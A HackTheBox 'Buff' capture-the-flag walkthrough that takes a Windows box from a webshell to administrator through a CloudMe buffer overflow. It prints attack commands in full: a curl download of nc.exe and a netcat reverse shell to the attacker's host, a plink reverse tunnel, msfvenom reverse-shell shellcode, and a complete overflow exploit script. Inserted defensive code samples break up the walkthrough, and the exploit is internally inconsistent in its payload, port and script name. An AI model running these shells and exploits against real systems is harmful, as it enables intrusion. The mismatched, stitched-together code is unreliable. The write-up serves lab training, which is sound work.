BUFF HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-22 09:37 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:37
Completed NSE at 09:37, 0.00s elapsed
Initiating NSE at 09:37
Completed NSE at 09:37, 0.00s elapsed
Initiating NSE at 09:37
Completed NSE at 09:37, 0.00s elapsed
Initiating Ping Scan at 09:37
Scanning 10.10.10.198 [4 ports]
Completed Ping Scan at 09:37, 0.90s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:37
Scanning buff.htb (10.10.10.198) [1000 ports]
Discovered open port 8080/tcp on 10.10.10.198
Completed SYN Stealth Scan at 09:38, 45.74s elapsed (1000 total ports)
Initiating Service scan at 09:38
Scanning 1 service on buff.htb (10.10.10.198)
Completed Service scan at 09:38, 9.32s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against buff.htb (10.10.10.198)
Retrying OS detection (try #2) against buff.htb (10.10.10.198)
Initiating Traceroute at 09:38
Completed Traceroute at 09:38, 0.41s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 09:38
Completed Parallel DNS resolution of 2 hosts. at 09:38, 0.29s elapsed
NSE: Script scanning 10.10.10.198.
Initiating NSE at 09:38
Completed NSE at 09:39, 34.64s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 12.42s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Nmap scan report for buff.htb (10.10.10.198)
Host is up (0.48s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Randomized

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   399.14 ms 10.10.14.1
2   413.69 ms buff.htb (10.10.10.198)

NSE: Script Post-scanning.
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.38 seconds
           Raw packets sent: 2106 (96.348KB) | Rcvd: 225 (19.761KB)

PORT 8080 ENUMERATION

There is not much here apart from an upload option on the admin page, so let's search for a public exploit for it:

https://www.exploit-db.com/exploits/48506

Here we go with our exploit!!
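The upload option is what hands over the web shell used in the next section, so it is worth seeing what a hardened upload handler looks like. The following is an added example, not code from this writeup or from the application on the box; it assumes a gallery-style upload that only ever needs raster images, ignores the client's declared content type, and treats every sample upload below as constructed test data.

```python
import secrets
from dataclasses import dataclass

# Extension allowlist and the magic bytes a file of that type must start with
# (assumption: this upload endpoint only needs raster images).
ALLOWED = {
    "png":  [b"\x89PNG\r\n\x1a\n"],
    "jpg":  [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif":  [b"GIF87a", b"GIF89a"],
}
MAX_SIZE = 2 * 1024 * 1024  # 2 MiB


@dataclass
class UploadResult:
    accepted: bool
    reason: str
    stored_name: str = ""  # server-chosen name, never the client's


def validate_upload(filename: str, content: bytes) -> UploadResult:
    """Decide whether an uploaded file may be stored. The client's declared
    Content-Type is ignored entirely: only the name shape and real bytes count."""
    # No directory components and no null bytes: the name must not steer the path.
    if "/" in filename or "\\" in filename or "\x00" in filename:
        return UploadResult(False, "path separator or null byte in file name")
    parts = filename.lower().split(".")
    # Exactly one extension: 'shell.php.png' style names are rejected outright,
    # because naive handlers may keep the first extension when building the stored name.
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return UploadResult(False, "missing or double extension")
    ext = parts[1]
    if ext not in ALLOWED:
        return UploadResult(False, f"extension .{ext} not allowed")
    if len(content) > MAX_SIZE:
        return UploadResult(False, "file too large")
    # The content must really look like the claimed type ...
    if not any(content.startswith(magic) for magic in ALLOWED[ext]):
        return UploadResult(False, "content does not match extension")
    # ... and must not carry PHP tags behind a valid image header (polyglot upload).
    if b"<?php" in content or b"<?=" in content:
        return UploadResult(False, "script markup inside image")
    # Store under a random server-chosen name so the client controls neither URL nor extension.
    return UploadResult(True, "ok", f"{secrets.token_hex(16)}.{ext}")


# Constructed sample uploads: one genuine-looking PNG and four attack patterns.
SAMPLES = {
    "photo.png":     b"\x89PNG\r\n\x1a\n" + b"\x00" * 64,
    "shell.php":     b"<?php system($_GET['c']); ?>",
    "shell.php.png": b"\x89PNG\r\n\x1a\n<?php system($_GET['c']); ?>",
    "nc.exe":        b"MZ" + b"\x00" * 62,
    "fake.png":      b"GIF89a" + b"\x00" * 32,
}


def review_samples():
    """Run every constructed sample through the validator."""
    return {name: validate_upload(name, data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in review_samples().items():
        print(f"{name:15} accepted={result.accepted} reason={result.reason}")
```

The random stored name is the piece that matters most: even if a check is bypassed later, the attacker cannot predict the URL of what was written. Storing uploads outside the web root, or in a directory where the web server will not execute scripts, is the complementary control that turns a bad upload into a harmless file.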

GETTING USER ACCESS

┌─[✗]─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #python web.py http://buff.htb:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.

C:\xampp\htdocs\gym\upload> curl http://10.10.14.135/nc.exe -o nc.exe
(binary output of the download, not shown)

C:\xampp\htdocs\gym\upload> .\nc.exe 10.10.14.135 9008 -e powershell.exe
┌─[✗]─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #rlwrap nc -lnvp 9008
listening on [any] 9008 ...
connect to [10.10.14.135] from (UNKNOWN) [10.10.10.198] 50045
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\xampp\htdocs\gym\upload> whoami
whoami
buff\shaun
PS C:\xampp\htdocs\gym\upload> cd c:\users\shaun\desktop
cd c:\users\shaun\desktop
PS C:\users\shaun\desktop> type user.txt
type user.txt
7ddf32e17a6ac5ce04a8ecbf782ca509
PS C:\users\shaun\desktop> 

GETTING ROOT ACCESS

Port 8888 on the box is used by CloudMe, which has a public buffer-overflow exploit, but the exploit is a Python script and we cannot run it on the Windows machine. Instead, we can forward that port back to our own machine and run the exploit locally.

Exploit : https://www.exploit-db.com/exploits/48389

Steps involved here:

1. Download Plink.exe: https://www.softpedia.com/get/Network-Tools/Telnet-SSH-Clients/Tatham-Plink.shtml

2. Upload it to Buff's machine.

3. Start the SSH service on your machine: service ssh start

4. Then run the following command on Buff:

.\Plink.exe -v -x -a -noagent -ssh -pw $PASSWORD -R 8888:127.0.0.1:8888 $USERNAME@$IP

Once the tunnel is up, plink drops you into a shell on your own machine, as shown below:

PS C:\users\shaun\downloads> .\Plink.exe -v -x -a -noagent -ssh -pw liquid -R 8888:127.0.0.1:8888 age@10.10.14.135 
.\Plink.exe -v -x -a -noagent -ssh -pw liquid -R 8888:127.0.0.1:8888 age@10.10.14.135 
Looking up host "10.10.14.135" for SSH connection
Connecting to 10.10.14.135 port 22
We claim version: SSH-2.0-PuTTY_Release_0.74
Remote version: SSH-2.0-OpenSSH_8.3p1 Debian-1
Using SSH protocol version 2
Doing ECDH key exchange with curve Curve25519 and hash SHA-256 (SHA-NI accelerated)
Server also has ecdsa-sha2-nistp256/ssh-rsa host keys, but we don't know any of them
Host key fingerprint is:
ssh-ed25519 255 32:90:52:02:e3:0d:b7:79:f4:73:03:9e:e1:cb:e8:ed
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 32:90:52:02:e3:0d:b7:79:f4:73:03:9e:e1:cb:e8:ed
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) n
Initialised AES-256 SDCTR (AES-NI accelerated) outbound encryption
Initialised HMAC-SHA-256 (SHA-NI accelerated) outbound MAC algorithm
Initialised AES-256 SDCTR (AES-NI accelerated) inbound encryption
Initialised HMAC-SHA-256 (SHA-NI accelerated) inbound MAC algorithm
Using username "age".
Sent password
Access granted
Requesting remote port 8888 forward to 127.0.0.1:8888
Opening main session channel
Remote port forwarding from 8888 enabled
Opened main channel
Allocated pty
Started a shell/command
Linux liquid 5.6.0-kali1-amd64 #1 SMP Debian 5.6.7-1kali1 (2020-05-12) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
age@liquid:~$

Now check the listening ports on our machine; port 8888 is forwarded and bound to loopback:

age@liquid:~$ netstat -ltn
netstat -ltn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:902             0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:50505         0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:3790            0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:8888          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:3001          0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN     
tcp6       0      0 :::902                  :::*                    LISTEN     
tcp6       0      0 ::1:7337                :::*                    LISTEN     
tcp6       0      0 ::1:8307                :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 ::1:8888                :::*                    LISTEN     
tcp6       0      0 :::443                  :::*                    LISTEN     
age@liquid:~$
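The netstat listing above is the check that the reverse forward from the plink step actually landed, and the detail worth noticing is that 8888 is bound to 127.0.0.1 and ::1 only. As an added example (not part of the writeup), here is a small parser for `netstat -ltn` output that reports whether a given port is absent, loopback-only, or exposed on every interface. The listing it parses is constructed in the same format as the one above, not a copy of it.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Listener:
    proto: str
    addr: str
    port: int


# Constructed sample in `netstat -ltn` format (same layout as the listing above,
# but not the writeup's own output).
SAMPLE = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:8888          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN
tcp6       0      0 ::1:8888                :::*                    LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
"""

LOOPBACK = {"127.0.0.1", "::1"}


def parse_listeners(text: str):
    """Extract (proto, address, port) for every TCP socket in LISTEN state."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        # Data rows have exactly six columns; the header and blank lines do not.
        if len(fields) != 6 or fields[0] not in ("tcp", "tcp6") or fields[5] != "LISTEN":
            continue
        # rpartition copes with IPv6 forms such as ':::22' and '::1:8888'.
        addr, _, port = fields[3].rpartition(":")
        listeners.append(Listener(fields[0], addr, int(port)))
    return listeners


def forward_status(listeners, port: int) -> str:
    """'absent' if nothing listens on the port, 'loopback' if every bind is
    127.0.0.1 or ::1, otherwise 'exposed' (reachable from other hosts)."""
    binds = [l for l in listeners if l.port == port]
    if not binds:
        return "absent"
    if all(l.addr in LOOPBACK for l in binds):
        return "loopback"
    return "exposed"


def check_forward(text: str, port: int) -> str:
    """Convenience wrapper: parse netstat text and classify one port."""
    return forward_status(parse_listeners(text), port)


if __name__ == "__main__":
    for p in (8888, 8080, 22, 9003):
        print(f"port {p}: {check_forward(SAMPLE, p)}")
```

OpenSSH binds a `-R` forward to loopback unless `GatewayPorts` is enabled on the server, which is the behaviour you want here: the tunneled CloudMe service should be reachable only from the machine running the exploit. A result of "exposed" for a forwarded port means anyone who can reach your box can also reach the service behind the tunnel.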

Next, generate a reverse-shell payload with msfvenom and substitute it for the payload in the exploit:

┌─[✗]─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.135 LPORT=9003 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of c file: 1386 bytes
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0a\x0e\x87\x68"
"\x02\x00\x23\x2b\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

Replace the calc.exe payload in the script with the reverse-shell payload generated above (the script's own comment shows the msfvenom options it expects, including the bad characters to avoid), run the exploit, and remember to start a listener on the LPORT given to msfvenom.

WHOLE CODE WILL LOOK LIKE THIS:

┌─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #cat exploit2.py 
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"   # CloudMe is reached through the SSH tunnel on localhost

padding1   = b"\x90" * 1052                 # filler up to the saved return address
EIP        = b"\xB5\x42\xA8\x68"            # 0x68A842B5 -> PUSH ESP, RET (little-endian)
NOPS       = b"\x90" * 30                   # short sled in front of the shellcode

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload    = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload   += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload   += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload   += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload   += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload   += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload   += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload   += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload   += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload   += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload   += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload   += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload   += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload   += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload   += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload   += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload   += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))  # pad the message to 1500 bytes

buf = padding1 + EIP + NOPS + payload + overrun

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # must match the local end of the port forward set up with plink
    s.connect((target, 9005))
    s.send(buf)
    s.close()
except Exception as e:
    print(e)   # report connection errors instead of failing silently
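From the defender's side, the message this exploit sends is easy to tell apart from normal traffic: a single message of around 1500 bytes to the CloudMe port, most of it one repeated byte, with a fixed return address in the middle. As an added example (not from the writeup or from the exploit author), here is a minimal host-side detector that scores a captured message on those three indicators. Both sample messages are constructed; the benign one does not claim to be the real CloudMe protocol, and the thresholds are assumptions chosen for this demonstration.

```python
CLOUDME_PORT = 8888
LEN_THRESHOLD = 1024      # assumption: legitimate messages are far shorter than this
RUN_THRESHOLD = 32        # assumption: no legitimate message repeats one byte this often
# Return address used by the public CloudMe 1.11.2 PoC (0x68A842B5, little-endian).
GADGET = b"\xb5\x42\xa8\x68"


def longest_run(data: bytes):
    """Return (byte_value, length) of the longest run of one repeated byte."""
    best_byte, best_len, cur_len, prev = None, 0, 0, None
    for b in data:
        cur_len = cur_len + 1 if b == prev else 1
        prev = b
        if cur_len > best_len:
            best_byte, best_len = b, cur_len
    return best_byte, best_len


def score_message(payload: bytes, dst_port: int):
    """Classify one message to CloudMe as 'benign', 'suspicious' or 'alert'."""
    reasons = []
    if dst_port != CLOUDME_PORT:
        return "ignore", reasons
    if len(payload) >= LEN_THRESHOLD:
        reasons.append(f"oversized message ({len(payload)} bytes)")
    byte, run = longest_run(payload)
    if run >= RUN_THRESHOLD:
        reasons.append(f"run of {run} x 0x{byte:02x} bytes (NOP sled or filler)")
    if GADGET in payload:
        reasons.append("contains the return address from the public PoC")
    if len(reasons) >= 2:
        return "alert", reasons
    if reasons:
        return "suspicious", reasons
    return "benign", reasons


# Constructed samples: a short text message and a 1500-byte overflow-shaped message
# laid out like the script above (filler, return address, sled, shellcode stand-in, padding).
BENIGN = b'<?xml version="1.0"?><ping/>'
OVERFLOW = b"\x90" * 1052 + GADGET + b"\x90" * 30 + b"\x41" * 100 + b"C" * 314


if __name__ == "__main__":
    for name, msg in (("benign", BENIGN), ("overflow", OVERFLOW)):
        verdict, why = score_message(msg, CLOUDME_PORT)
        print(f"{name}: {verdict} {why}")
```

The gadget match is specific to this one PoC and will miss any rewrite that picks a different address; the length and repeated-byte indicators are what catch variants. Because CloudMe listens on loopback, the sensor has to sit on the host itself (or on the SSH server end of a tunnel like the one above) rather than on the network perimeter.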

RUN THE EXPLOIT :

┌─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #python exploit1.py 

ON NETCAT LISTENER :

age@liquid:/root/Desktop/HTB/buff$ nc -lnvp 9003
listening on [any] 9003 ...
connect to [10.10.14.135] from (UNKNOWN) [10.10.10.198] 49778
Microsoft Windows [Version 10.0.17134.1550]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd c:\users\administrator\desktop                
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>type root.txt
type root.txt
3dc4c38834d57057973b16256cc750d6

And that is administrator access.

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
